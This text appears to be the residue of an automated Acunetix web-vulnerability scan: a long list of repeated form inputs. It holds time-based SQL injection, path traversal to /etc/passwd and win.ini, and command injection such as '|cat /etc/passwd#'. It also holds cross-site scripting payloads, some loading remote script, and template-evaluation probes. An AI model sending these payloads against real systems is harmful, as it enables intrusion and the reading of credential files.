
1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1&lt

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

\xf6<img acu onmouseover=prompt(976687) //\xf6>

1

-1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

-1)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<input autofocus onfocus=prompt(918325)>

|cat /etc/passwd#

1

-1))

${99959+99373}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

rb3LMA5C'

1

1&n933318=v982312

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

"|"ld

1some_inexistent_file_with_long_name%00.jpg

ut81Or8o'

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1_Un0DJ <ScRiPt >prompt(996046)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

GtUdFBWl'

^(#$!@#$)(()))******

1

/etc/passwd

1

testasp.vulnweb.com

'

'

1

iDxq82uq')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

JwzXpKYm'))

1

1

1

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1)

http://hitBqBiCHgXSb.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

1

file:///etc/passwd

'&dir&'

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

-1))

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

|dir

WEB-INF/web.xml

qI9Mikyb'

http://www.acunetix.tst

comments

'"

1

1

WEB-INF\web.xml

'|dir

g3TZWAfa')

1

comments/.

<!--

1

1'"()&%<ScRiPt >prompt(951158)</ScRiPt>

1

'"()&%<ScRiPt >prompt(937665)</ScRiPt>

zITMZeyw'))

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1

1_978424

1

../../../../../../../../../../boot.ini

1

1

1

1

acu7729\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7729

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux3526\xc0\xbez1\xc0\xbcz2a\x90bcxuca3526

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(917989)</ScRiPt>

1

1

................windowswin.ini

1

1

1<script>prompt(997298)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(997574)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979149></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(993566)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(927610)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964598)"></g></svg>

WEB-INF\web.xml

1<div style=width:expression(prompt(931246))>

1

1

1

1<iframe src='data:text/html

1

response.write(9041623*9709648)

1

1<body onload=prompt(977708)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905788)>

'+response.write(9041623*9709648)+'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(957681)>

1

"+response.write(9041623*9709648)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<img/src=">" onerror=alert(964577)>

1

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<ScRiPt%20>prompt(900096)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1

cat /etc/passwd

1

1&lt

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1

\xf6<img acu onmouseover=prompt(918273) //\xf6>

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100022+99977}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1<input autofocus onfocus=prompt(928788)>

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n980840=v941606

1some_inexistent_file_with_long_name%00.jpg

'|'ld

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

x5an4QYa'

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

HtUMrNE7')

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1_eo8Dx <ScRiPt >prompt(990066)</ScRiPt>

1

/etc/passwd

ylPtoZaT'))

1

1

'

'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

1

-1))

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitJPI9N8HjR6.bxss.me/

lI1bZgtM'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

'&dir&'

1

acunetix_wvs_invalid_filename

1

1

1

ZPTxGFo4')

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

comments

http://www.acunetix.tst

1

'"

mOW7PLFY'))

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(996636)</ScRiPt>

1

|dir

comments

1

1

<!--

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(934775)</ScRiPt>

1

'|dir

comments/.

1

../../../../../../../../../../windows/win.ini

1

1

1_977765

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

acu10277\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10277

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux10404\xc0\xbez1\xc0\xbcz2a\x90bcxuca10404

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(993025)</ScRiPt>

1

1

1

1

................windowswin.ini

1<script>prompt(939835)</script>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(931956)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905910></ScRiPt>

1

1

1

1<ScRiPt >prompt(958417)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(957883)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919377)"></g></svg>

1

WEB-INF/web.xml

1<div style=width:expression(prompt(905758))>

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

response.write(9872960*9843162)

1<body onload=prompt(953858)>

1

1

1

'+response.write(9872960*9843162)+'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908429)>

1

1

"+response.write(9872960*9843162)+"

1

1

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(978115)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(11.359),0)/*'XOR(if(now()=sysdate(),sleep(11.359),0))OR'"XOR(if(now()=sysdate(),sleep(11.359),0))OR"*/

'&cat /etc/passwd&'

1<img/src=">" onerror=alert(941118)>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(11.359)))v)/*'+(select(0)from(select(sleep(11.359)))v)+'"+(select(0)from(select(sleep(11.359)))v)+"*/

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(986494)</sCripT>

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1&lt

1

1

-1)

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(923808) //\xf6>

1

1

1

1

-1))

${99798+99315}

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<input autofocus onfocus=prompt(984878)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n957536=v999600

'|'ld

1

Mp2er0qO'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1

1some_inexistent_file_with_long_name%00.jpg

)

r3Es35os')

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1_1Kqrz <ScRiPt >prompt(908402)</ScRiPt>

Izd5RwsT'))

1

/etc/passwd

'"()

1

testasp.vulnweb.com

'

^(#$!@#$)(()))******

1

'

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1))

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

&dir

tC4tB6Re'

1

http://hitQ9hjhxt72r.bxss.me/

1

1

acunetix_wvs_invalid_filename

'&dir&'

renatEnl')

1

file:///etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

"&dir&"

mmMEW3r0'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

http://www.acunetix.tst

|dir

'"

comments

1

1

WEB-INF/web.xml

'|dir

1

1'"()&%<ScRiPt >prompt(973902)</ScRiPt>

1

<!--

comments/.

1

1

WEB-INF\web.xml

"|dir

1

'"()&%<ScRiPt >prompt(985492)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1_999589

1

1

1

1

../../../../../../../../../../boot.ini

1

acu7272\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7272

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux10065\xc0\xbez1\xc0\xbcz2a\x90bcxuca10065

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(962444)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(975823)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(906875)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943172></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(957072)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(967749)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972740)"></g></svg>

WEB-INF/web.xml

1

1<div style=width:expression(prompt(909123))>

WEB-INF\web.xml

1

1<iframe src='data:text/html

response.write(9376170*9901008)

1

1

'+response.write(9376170*9901008)+'

1

1<body onload=prompt(951552)>

1

1

"+response.write(9376170*9901008)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986966)>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(990036)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(999762)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<ScRiPt%20>prompt(939613)</sCripT>

cat /etc/passwd

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99426+99768}

1

-1)

-1))

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(981862) //\xf6>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

cVpkxFpZ'

'|'ld

1&n910819=v947561

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(944680)>

)

1some_inexistent_file_with_long_name%00.jpg

1

J7guPgaW')

"|"ld

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

D6PO92ee'))

^(#$!@#$)(()))******

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

testasp.vulnweb.com

1

'

-1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_fz4q7 <ScRiPt >prompt(979855)</ScRiPt>

1

1

1

"

"

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

http://hitmNf8lWOqpf.bxss.me/

'&dir&'

1

file:///etc/passwd

1

GRSvTd4w'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

comments

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

P7EMpJNE')

1

1

comments

1

http://www.acunetix.tst

|dir

WEB-INF/web.xml

1

fSP5s6yl'))

1'"()&%<ScRiPt >prompt(933766)</ScRiPt>

'"

comments/.

1

1

'|dir

<!--

WEB-INF\web.xml

1

1

'"()&%<ScRiPt >prompt(948288)</ScRiPt>

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1_991552

1

1

1

1

../../../../../../../../../../boot.ini

1

acu7782\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7782

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3503\xc0\xbez1\xc0\xbcz2a\x90bcxuca3503

1

1

1

1<ScRiPt >prompt(949740)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(952600)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(946719)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968379></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(992901)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(933291)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924522)"></g></svg>

1

1

1<div style=width:expression(prompt(954583))>

1

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

WEB-INF\web.xml

1<body onload=prompt(913254)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983515)>

1

1

1<img src=xyz OnErRor=prompt(984026)>

1

response.write(9110625*9039760)

1

'+response.write(9110625*9039760)+'

1<img/src=">" onerror=alert(981969)>

1

&cat /etc/passwd&

1

1

1

1<ScRiPt%20>prompt(991474)</sCripT>

"+response.write(9110625*9039760)+"

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1&lt

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

\xf6<img acu onmouseover=prompt(941220) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

-1

1

1<input autofocus onfocus=prompt(979524)>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

${100299+99011}

1

1

-1)

<a href='http://www.acunetix.com'>website security</a>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1&n932545=v973728

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1_WlnEb <ScRiPt >prompt(929493)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

MzOsRCGW'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

urpe0KLw')

/etc/passwd

1

1

'

1

'

1

1

gGXKBoQ4'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

acunetix_wvs_invalid_filename

1

http://hitXMcFOIvuRo.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

1

1

1

YtrdPbOp'

file:///etc/passwd

1

comments

1

http://www.acunetix.tst

1

'"

/\../\../\../\../\../\../\../etc/passwd

2eHjPhhf')

1'"()&%<ScRiPt >prompt(965422)</ScRiPt>

1

comments/.

"&dir&"

|dir

1

1

<!--

1

WEB-INF/web.xml

vCblCFdg'))

'"()&%<ScRiPt >prompt(949235)</ScRiPt>

1

'|dir

1

1

1

1

WEB-INF\web.xml

1

1_925756

"|dir

1

1

1

1

acu1625\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1625

../../../../../../../../../../windows/win.ini

1

1

1

1

acux2527\xc0\xbez1\xc0\xbcz2a\x90bcxuca2527

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(992166)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(948248)</script>

1

1<ScRiPt >prompt(916744)</ScRiPt>

1

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986422></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<ScRiPt >prompt(962604)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(969415)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933666)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(954746))>

1

1

1<iframe src='data:text/html

1<body onload=prompt(907822)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998115)>

1

response.write(9770792*9460177)

1

1

1<img src=xyz OnErRor=prompt(941290)>

1

'+response.write(9770792*9460177)+'

&cat /etc/passwd&

1

1<img/src=">" onerror=alert(916668)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9770792*9460177)+"

1<ScRiPt%20>prompt(905654)</sCripT>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1&lt

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

\xf6<img acu onmouseover=prompt(922119) //\xf6>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1

-1

1<input autofocus onfocus=prompt(989607)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

<a href='http://www.acunetix.com'>website security</a>

1

${100310+99625}

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1&n974524=v900559

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

[url=http://www.acunetix.com]website security[/url]

1

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

1_ZVaiS <ScRiPt >prompt(902964)</ScRiPt>

)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

X0woZHnT'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

'

1

!(()&&!|*|*|

C4KdU5LE')

1

testasp.vulnweb.com

/etc/passwd

1

"

1

'

^(#$!@#$)(()))******

1

1

XApdsZko'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitEuQABzP8gg.bxss.me/

1

||cat /etc/passwd

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

1

1

&dir

-1))

1

comments

1

1

1

TQ6IEKA9'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'&dir&'

'"

1'"()&%<ScRiPt >prompt(984001)</ScRiPt>

comments/.

file:///etc/passwd

1

1

1

KUvAaRUf')

"&dir&"

1

'"()&%<ScRiPt >prompt(912092)</ScRiPt>

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

xMB6ZMuW'))

|dir

1_959355

WEB-INF/web.xml

1

1

1

1

1

'|dir

1

WEB-INF\web.xml

acu2428\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2428

1

1

"|dir

acux6879\xc0\xbez1\xc0\xbcz2a\x90bcxuca6879

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(938117)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(931627)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(991117)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921996></ScRiPt>

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(909842)</ScRiPt>

1

1<video><source onerror="javascript:prompt(928587)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959347)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(962877))>

1

1<iframe src='data:text/html

